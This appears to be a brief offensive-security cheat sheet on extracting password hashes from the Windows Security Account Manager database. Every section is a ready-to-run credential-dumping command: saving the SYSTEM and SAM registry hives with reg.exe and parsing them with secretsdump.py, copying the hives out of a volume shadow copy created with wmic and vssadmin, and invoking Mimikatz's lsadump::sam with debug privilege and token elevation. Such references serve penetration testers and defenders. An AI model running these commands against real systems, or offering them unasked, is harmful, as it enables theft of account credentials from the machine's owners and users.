SAM

Security Account Manager

reg.exe

Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\sam sam.hive
$ secretsdump.py -system system.hive -sam sam.hive LOCAL

vssadmin

Cmd > wmic shadowcopy call create Volume='C:\'
Cmd > vssadmin list shadows
Cmd > copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system system.hive
Cmd > copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam sam.hive

Mimikatz

PS > Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "log out.txt" "lsadump::sam" "exit"'

Last updated